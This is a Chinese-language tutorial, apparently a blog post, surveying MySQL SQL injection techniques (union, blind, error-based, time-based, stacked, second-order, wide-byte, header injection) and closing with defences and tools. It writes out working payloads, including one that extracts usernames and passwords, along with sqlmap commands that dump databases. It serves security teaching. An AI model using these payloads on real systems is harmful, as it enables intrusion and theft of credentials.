SQL注入全面解析与实战指南<\/h1>

一、SQL注入基础概念<\/h2>

1.1 漏洞描述<\/h3>
SQL注入是指Web应用对用户输入数据没有经过严格判断和过滤，用户输入的参数被直接带入数据库作为查询参数执行。攻击者通过构造特殊参数改变SQL语句原本逻辑，执行攻击者指定的操作（如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等）。<\/p>
本质<\/strong>：违背"数据与代码分离"原则，把用户输入的参数当作代码执行。<\/p>

1.2 SQL注入条件<\/h3>

用户可以控制前端传给后端的参数内容<\/li>
用户输入的参数会被带入数据库，拼接到SQL语句中进行查询<\/li> <\/ol>
二、MySQL相关知识<\/h2>
2.1 information_schema库<\/h3>
MySQL 5.0+默认包含的数据库，重点关注三个表：<\/p>

SCHEMATA<\/strong>：存储用户创建的所有数据库名（SCHEMA_NAME字段）<\/li>
TABLES<\/strong>：存储所有数据库的库名和表名（TABLE_SCHEMA和TABLE_NAME字段）<\/li>
COLUMNS<\/strong>：存储所有数据库的库名、表名和字段名（TABLE_SCHEMA、TABLE_NAME和COLUMN_NAME字段）<\/li> <\/ul>
2.2 常用函数<\/h3>

DATABASE()<\/code>：返回当前选择的数据库名<\/li>
VERSION()<\/code>：返回MySQL服务器版本信息<\/li>
USER()<\/code>：返回当前MySQL会话登录用户信息<\/li> <\/ul> 2.3 注释符<\/h3> #<\/code>：单行注释（URL编码为%23）<\/li> -- <\/code>：单行注释（URL中用"+"或%20表示空格）<\/li> \/*...*\/<\/code>：多行注释<\/li> \/*! code *\/<\/code>：内联注释（MySQL特定版本执行）<\/li> <\/ul> 2.4 参数位置<\/h3> URL中（GET请求）<\/li> POST请求体<\/li> COOKIE<\/li> 其他请求头<\/li> <\/ul> 2.5 参数数据类型<\/h3> int整型：select * from users where id=1<\/code><\/li> string字符型：select * from users where username='admin'<\/code><\/li> like搜索型：select * from news where title like '%标题%'<\/code><\/li> <\/ul> 三、Union联合注入<\/h2> 3.1 关键技术<\/h3> UNION<\/strong>：合并多个SELECT结果集<\/li> ORDER BY<\/strong>：通过列名或位置排序，可判断列数<\/li> 占位符<\/strong>：临时填充查询位置（如SELECT 1,2,3<\/code>）<\/li> 子查询<\/strong>：嵌套查询技术<\/li> LIMIT<\/strong>：限制返回记录数（LIMIT offset,count<\/code>）<\/li> GROUP_CONCAT()<\/strong>：将分组内多行值连接成字符串<\/li> CONCAT()<\/strong>：拼接多个字符串<\/li> <\/ul> 3.2 漏洞利用步骤<\/h3> 注入测试<\/strong>：通过添加单引号和注释符测试注入点<\/li> 判断列数<\/strong>：使用ORDER BY n<\/code>逐步增加n直到报错<\/li> 确定回显位<\/strong>：使用UNION SELECT 1,2,...<\/code>查看哪些列会显示<\/li> 信息收集<\/strong>：版本和数据库：union select version(),database()<\/code><\/li> 表名：union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'<\/code><\/li> 字段名：union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'<\/code><\/li> 数据内容：union select group_concat(user),group_concat(password) from users<\/code><\/li> <\/ul> <\/li> <\/ol> 四、Boolean布尔盲注<\/h2> 4.1 关键技术<\/h3> IF()<\/strong>：IF(condition, true_value, false_value)<\/code><\/li> SUBSTRING()\/SUBSTR()\/MID()<\/strong>：提取子字符串<\/li> LEFT()\/RIGHT()<\/strong>：从开头\/末尾提取字符串<\/li> LENGTH()<\/strong>：计算字符串字节长度<\/li> CHAR_LENGTH()<\/strong>：计算字符串字符数<\/li> <\/ul> 4.2 漏洞利用<\/h3> 注入测试<\/strong>：使用and 1=1<\/code>和and 1=2<\/code>验证注入<\/li> 信息获取<\/strong>：数据库名长度：and length(database())=n<\/code><\/li> 逐个字符猜测：and substr(database(),1,1)='a'<\/code><\/li> <\/ul> <\/li> 自动化工具<\/strong>：使用Burpsuite的Intruder模块（Cluster bomb模式）加速猜测过程<\/li> <\/ol> 五、报错注入<\/h2> 5.1 关键技术<\/h3> floor()<\/strong>：结合rand()和group by制造报错<\/li> extractvalue()<\/strong>：XML解析函数，用于报错显示<\/li> updatexml()<\/strong>：XML修改函数，报错显示（限制32字符）<\/li> 几何函数<\/strong>：geometrycollection(), multipoint(), polygon()等<\/li> exp()<\/strong>：数学函数制造报错<\/li> <\/ul> 5.2 漏洞利用<\/h3> 获取库名<\/strong>：and updatexml(1,concat(0x7e,database(),0x7e),1)<\/code><\/li> 获取表名<\/strong>：and (select 1 from (select count(*),concat((SELECT concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1), floor(rand(0)*2))x from information_schema.tables group by x)a)<\/code><\/li> 获取字段和数据<\/strong>：类似方法逐步获取<\/li> <\/ol> 六、时间注入<\/h2> 6.1 关键技术<\/h3> SLEEP()<\/strong>：暂停执行指定秒数<\/li> BENCHMARK()<\/strong>：重复执行表达式评估性能<\/li> <\/ul> 6.2 漏洞利用<\/h3> 基本测试<\/strong>：and if(2>1,sleep(5),1)<\/code>观察响应时间<\/li> sqlmap自动化<\/strong>： sqlmap -u "url"<\/span> -p name -v 1<\/span> --technique=<\/span>T <\/span><\/span>sqlmap -u "url"<\/span> -p name -v 1<\/span> --technique=<\/span>T --current-user --current-db --batch <\/span><\/span>sqlmap -u "url"<\/span> -p name -v 1<\/span> --technique=<\/span>T -D dbname --tables --batch <\/span><\/span><\/code><\/pre><\/li> <\/ol> 七、其他注入类型<\/h2> 7.1 堆叠注入<\/h3> 原理<\/strong>：利用mysqli_multi_query()<\/code>一次执行多条SQL语句<\/li> 利用<\/strong>：在注入点后添加分号和新语句，如; insert into users values(...)<\/code><\/li> <\/ul> 7.2 二次注入<\/h3> 原理<\/strong>：第一次插入时转义特殊字符，但存储时恢复原状；第二次使用时直接拼接导致注入<\/li> 利用<\/strong>：注册含特殊字符的用户名，后续操作触发注入<\/li> <\/ul> 7.3 宽字节注入<\/h3> 原理<\/strong>：GBK等双字节编码导致转义字符被"吃掉"<\/li> 利用<\/strong>：使用%df%27<\/code>等组合绕过转义<\/li> <\/ul> 7.4 COOKIE注入<\/h3> 原理<\/strong>：从COOKIE获取未过滤的参数<\/li> 利用<\/strong>：修改COOKIE值进行注入<\/li> <\/ul> 7.5 Base64编码注入<\/h3> 原理<\/strong>：参数Base64解码后直接拼接SQL<\/li> 利用<\/strong>：将注入语句Base64编码后提交<\/li> <\/ul> 7.6 HTTP头注入（XFF、User-Agent等）<\/h3> 原理<\/strong>：从HTTP头获取未过滤的参数<\/li> 利用<\/strong>：修改对应头字段进行注入<\/li> <\/ul> 八、防御措施<\/h2> 使用参数化查询（预处理语句）<\/li> 对输入进行严格过滤和转义<\/li> 最小权限原则，数据库账户限制权限<\/li> 关闭错误回显<\/li> 使用Web应用防火墙(WAF)<\/li> 定期安全审计和漏洞扫描<\/li> <\/ol> 九、工具推荐<\/h2> sqlmap<\/strong>：自动化SQL注入工具<\/li> Burpsuite<\/strong>：用于手动测试和自动化猜测<\/li> Havij<\/strong>：图形化SQL注入工具<\/li> NoSQLMap<\/strong>：针对NoSQL数据库的注入工具<\/li> <\/ol> 通过全面理解这些注入技术和防御措施，安全人员可以更有效地发现和修复SQL注入漏洞，开发人员也能编写更安全的代码。<\/p>